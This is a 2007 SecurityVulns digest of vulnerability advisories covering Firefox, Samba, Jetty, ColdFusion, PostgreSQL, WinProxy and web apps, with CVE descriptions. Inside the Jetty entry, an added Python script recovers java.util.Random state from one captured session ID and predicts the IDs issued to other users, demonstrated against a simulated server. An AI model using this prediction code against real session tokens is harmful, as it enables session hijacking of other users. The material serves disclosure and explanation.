Computer Security


Mozilla Firefox weak PRNG generator
Published:05.02.2007
Source:
SecurityVulns ID:7180
Type:client
Threat Level:
5/10
Description:A weak PRNG (rand() seeded with srand() from the current time) is used to generate temporary file names for XMLHttpRequest downloads, so the name is predictable. Combined with the popup-blocker zone confusion (CVE-2007-0800), an attacker can create a temporary HTML file with a predictable name and have it opened from the file:// zone to read the contents of local files.
Affected:MOZILLA : Firefox 1.5
CVE:CVE-2007-0801 (The nsExternalAppHandler::SetUpTempFile function in Mozilla Firefox 1.5.0.9 creates temporary files with predictable filenames based on creation time, which allows remote attackers to execute arbitrary web script or HTML via a crafted XMLHttpRequest.)
 CVE-2007-0800 (Cross-zone vulnerability in Mozilla Firefox 1.5.0.9 considers blocked popups to have an internal zone origin, which allows user-assisted remote attackers to cross zone restrictions and read arbitrary file:// URIs by convincing a user to show a blocked popup.)
Original document: Michal Zalewski, [Full-disclosure] Firefox + popup blocker + XMLHttpRequest + srand() = oops (05.02.2007)

Samba file server multiple security vulnerabilities
updated since 05.02.2007
Published:05.02.2007
Source:
SecurityVulns ID:7181
Type:remote
Threat Level:
6/10
Description:Buffer overflow in the Solaris nss_winbind.so.1 library in the gethostbyname() and getipnodebyname() functions. Remote DoS against smbd (infinite loop in the deferred open queue, triggered by an authenticated user renaming a file). Format string vulnerability in the afsacl.so VFS plugin, triggered by format specifiers in a filename on an AFS file system.
Affected:SAMBA : Samba 3.0
CVE:CVE-2007-0454 (Format string vulnerability in the afsacl.so VFS module in Samba 3.0.6 through 3.0.23d allows context-dependent attackers to execute arbitrary code via format string specifiers in a filename on an AFS file system, which is not properly handled during Windows ACL mapping.)
 CVE-2007-0453 (Buffer overflow in the nss_winbind.so.1 library in Samba 3.0.21 through 3.0.23d, as used in the winbindd daemon on Solaris, allows attackers to execute arbitrary code via the (1) gethostbyname and (2) getipnodebyname functions.)
 CVE-2007-0452 (smbd in Samba 3.0.6 through 3.0.23d allows remote authenticated users to cause a denial of service (memory and CPU exhaustion) by renaming a file in a way that prevents a request from being removed from the deferred open queue, which triggers an infinite loop.)
Original document: SAMBA, [SAMBA-SECURITY] CVE-2007-0454: Format string bug in afsacl.so VFS plugin (05.02.2007)
 SAMBA, [SAMBA-SECURITY] CVE-2007-0452: Potential DoS against smbd in Samba 3.0.6 - 3.0.23d (05.02.2007)
 SAMBA, [SAMBA-SECURITY] CVE-2007-0453: Buffer overrun in nss_winbind.so.1 on Solaris (05.02.2007)

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:05.02.2007
Source:
SecurityVulns ID:7182
Type:remote
Threat Level:
5/10
Description:PHP file inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.
Affected:DVDDB : DVDdb 0.6
 SAKIC : Wap Portal Server 1.2
 TUFAT : Flashchat 4.7
CVE:CVE-2007-0834 (Cross-site scripting (XSS) vulnerability in FlashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via the user name field when the user joins a chat room, a different vulnerability than CVE-2007-0807. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.)
 CVE-2007-0814 (Multiple cross-site scripting (XSS) vulnerabilities in Adrenalin's ASP Chat allow remote attackers to inject arbitrary web script or HTML (1) via the psuedo (pseudo) field or (2) during chat.)
 CVE-2007-0813 (Cross-site scripting (XSS) vulnerability in Home production MySearchEngine allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.)
 CVE-2007-0807 (Cross-site scripting (XSS) vulnerability in info.php in flashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via a channel title (aka room name) that is not properly handled by the "who's online" feature.)
 CVE-2007-0795 (Multiple PHP remote file inclusion vulnerabilities in Wap Portal Server 1.x allow remote attackers to execute arbitrary PHP code via a URL in the language parameter to (1) index.php and (2) admin/index.php.)
 CVE-2007-0794 (** DISPUTED ** SQL injection vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary SQL commands via the user parameter. NOTE: this issue has been disputed by a reliable third party, who states that inc/common.php only contains function definitions.)
 CVE-2007-0793 (PHP remote file inclusion vulnerability in inc/common.php in GlobalMegaCorp dvddb 0.6 allows remote attackers to execute arbitrary PHP code via a URL in the config parameter.)
Original document: binaryloc_(at)_gmail.com, flashChat 4.7.8 Cross Site Scripting Vulnerability (05.02.2007)
 stormhacker_(at)_hotmail.com, flashChat 4.7.8 Cross Site Scripting Vulnerability (05.02.2007)
 stormhacker_(at)_hotmail.com, Wap Portal Serve 1.* <= Remote File Inclusion (05.02.2007)
 gokhankaya_(at)_hotmail.com, dvddb-0.6 media remote file include vuln. (05.02.2007)
 gokhankaya_(at)_hotmail.com, dvddb-0.6 media sql-inj. vuln. (05.02.2007)
 Omid, Sql injection bugs in Xoops 2.0.16 + Weblinks module (05.02.2007)
 sn0oPy.team_(at)_gmail.com, Adrenalin's ASP Chat XSS (05.02.2007)
 sn0oPy.team_(at)_gmail.com, MysearchEngine XSS (05.02.2007)

Multiple VMware clipboard problems
Published:05.02.2007
Source:
SecurityVulns ID:7183
Type:local
Threat Level:
3/10
Description:Content removed from the clipboard may reappear when switching focus between the host and guest systems, and toggling the shared-clipboard option does not take effect immediately.
Affected:VMWARE : VMware Workstation 5.5
CVE:CVE-2007-0833 (VMware Workstation 5.5.3 34685, when the "Enable copy and paste to and from this virtual machine" option is enabled, preserves clipboard data on the guest operating system after it was deleted on the host operating system, which might allow local users to read clipboard contents by moving the focus back to the host operating system.)
 CVE-2007-0832 (VMware Workstation 5.5.3 34685 does not immediately change the availability of a shared clipboard when the "Enable copy and paste to and from this virtual machine" checkbox is changed, which allows local users to obtain sensitive information or conduct certain attacks that are facilitated by weaker isolation between the host and guest operating systems.)
Original document: Eitan Caspi, Vmare workstation guest isolation weaknesses (clipboard transfer) (05.02.2007)

Jetty web server weak pseudo-random number generator
Published:05.02.2007
Source:
SecurityVulns ID:7184
Type:remote
Threat Level:
5/10
Description:A weak PRNG (java.util.Random) is used to generate session identifiers, making session IDs predictable: an attacker who observes their own session ID can recover the generator state and compute the IDs issued to other users, hijacking their sessions.
Affected:JETTY : Jetty 5.1
 JETTY : Jetty 4.2
 JETTY : Jetty 6.0
 JETTY : Jetty 6.1
CVE:CVE-2006-6969 (Jetty before 4.2.27, 5.1 before 5.1.12, 6.0 before 6.0.2, and 6.1 before 6.1.0pre3 generates predictable session identifiers using java.util.random, which makes it easier for remote attackers to guess a session identifier through brute force attacks, bypass authentication requirements, and possibly conduct cross-site request forgery attacks.)
Original document: NGSSoftware Insight Security Research Advisory (NISR), Jetty Session ID Prediction (05.02.2007)
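The entry above says session IDs built from java.util.Random are predictable. The following added example (not code from the advisory or from Jetty) shows why: java.util.Random is a 48-bit linear congruential generator whose nextInt() exposes the top 32 bits of the state, so one observed nextLong() (two consecutive next(32) calls) leaves only 16 bits to brute-force, after which every later output is known. The session-ID format (one nextLong() rendered as 16 hex digits) and the server seed are assumptions made for the demonstration, not Jetty's actual scheme.

```python
"""
Recover java.util.Random's internal state from one observed 64-bit output and
predict the values that follow. Added example; the session-ID encoding below is
an assumption for illustration, not the format Jetty used.
"""

MASK48 = (1 << 48) - 1
MULT = 0x5DEECE66D
ADD = 0xB
U32 = (1 << 32) - 1
U64 = (1 << 64) - 1


def _signed(v, bits):
    """Reinterpret an unsigned value as Java's two's-complement int (32) or long (64)."""
    v &= (1 << bits) - 1
    return v - (1 << bits) if v >= (1 << (bits - 1)) else v


class JavaRandom:
    """Python port of java.util.Random's 48-bit LCG (same constants as the JDK)."""

    def __init__(self, seed):
        self.state = (seed ^ MULT) & MASK48

    @classmethod
    def from_state(cls, state):
        """Build a generator positioned at a recovered internal state."""
        r = cls.__new__(cls)
        r.state = state & MASK48
        return r

    def next_bits(self, bits):
        self.state = (self.state * MULT + ADD) & MASK48
        return self.state >> (48 - bits)

    def next_int(self):
        return _signed(self.next_bits(32), 32)

    def next_long(self):
        # JDK: ((long) next(32) << 32) + next(32), with signed 32-bit halves
        hi = self.next_int()
        lo = self.next_int()
        return _signed((hi << 32) + lo, 64)


def session_id(value):
    """Assumed session-ID encoding: one nextLong() as 16 lowercase hex digits."""
    return format(value & U64, "016x")


def recover_state(observed_long):
    """Return the generator state right after the observed nextLong(), or None.

    The two next(32) halves each reveal the top 32 of the 48 state bits, so the
    only unknown is the low 16 bits of the state behind the first half.
    """
    u = observed_long & U64
    lo_u = u & U32                     # second next(32), as unsigned bits
    lo_s = _signed(lo_u, 32)           # ... as the signed int Java added
    hi_u = ((u - lo_s) & U64) >> 32    # first next(32), as unsigned bits
    for low16 in range(1 << 16):
        state_hi = (hi_u << 16) | low16
        state_lo = (state_hi * MULT + ADD) & MASK48
        if state_lo >> 16 == lo_u:
            return state_lo
    return None


def predict_session_ids(observed_id, count):
    """Given one captured session ID, compute the next `count` IDs the server will issue."""
    state = recover_state(int(observed_id, 16))
    if state is None:
        return None
    r = JavaRandom.from_state(state)
    return [session_id(r.next_long()) for _ in range(count)]


if __name__ == "__main__":
    server = JavaRandom(0x1234)                      # constructed: seed unknown to the attacker
    mine = session_id(server.next_long())            # the attacker's own session
    others = [session_id(server.next_long()) for _ in range(3)]  # sessions issued to later users
    print(predict_session_ids(mine, 3) == others)    # True
```

The search over 65,536 candidates takes well under a second; the defence is to draw session identifiers from java.security.SecureRandom, which is what the fixed Jetty releases listed in the CVE do.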

ColdFusion cross-site scripting
Published:05.02.2007
Source:
SecurityVulns ID:7185
Type:remote
Threat Level:
5/10
Description:The User-Agent header from the HTTP request is echoed unfiltered into error page text. Because the client's User-Agent header can be set through Flash, the injection is reachable from a remote page.
Affected:ADOBE : ColdFusion Server 5.0
CVE:CVE-2007-0817 (Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page.)
Original document: digi7al64_(at)_gmail.com, Cold Fusion Web Server XSS 0 day (05.02.2007)

PostgreSQL multiple security vulnerabilities
Published:05.02.2007
Source:
SecurityVulns ID:7186
Type:remote
Threat Level:
6/10
Description:Reading of server memory by authenticated users: data type checks on SQL function arguments can be disabled, and a cached query plan is not revalidated when ALTER COLUMN TYPE changes a table during execution. Both allow a server crash and possibly reading arbitrary server memory.
Affected:POSTGRES : PostgreSQL 7.4
CVE:CVE-2007-0556 (The query planner in PostgreSQL before 8.0.11, 8.1 before 8.1.7, and 8.2 before 8.2.2 does not verify that a table is compatible with a "previously made query plan," which allows remote authenticated users to cause a denial of service (server crash) and possibly access database content via an "ALTER COLUMN TYPE" SQL statement, which can be leveraged to read arbitrary memory from the server.)
 CVE-2007-0555 (PostgreSQL 7.3 before 7.3.13, 7.4 before 7.4.16, 8.0 before 8.0.11, 8.1 before 8.1.7, and 8.2 before 8.2.2 allows attackers to disable certain checks for the data types of SQL function arguments, which allows remote authenticated users to cause a denial of service (server crash) and possibly access database content.)
Original document: UBUNTU, [Full-disclosure] [USN-417-1] PostgreSQL vulnerabilities (05.02.2007)

WinProxy buffer overflow
Published:05.02.2007
Source:
SecurityVulns ID:7187
Type:remote
Threat Level:
6/10
Description:Heap overflow while parsing a long HTTP CONNECT proxy request.
Affected:BLUECOAT : WinProxy 6.0
 BLUECOAT : WinProxy 6.1
CVE:CVE-2007-0796 (Blue Coat Systems WinProxy 6.1a and 6.0 r1c, and possibly earlier, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long HTTP CONNECT request, which triggers heap corruption.)
Original document: IDEFENSE, [Full-disclosure] iDefense Security Advisory 02.02.07: Blue Coat Systems WinProxy CONNECT Method Heap Overflow Vulnerability (05.02.2007)

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod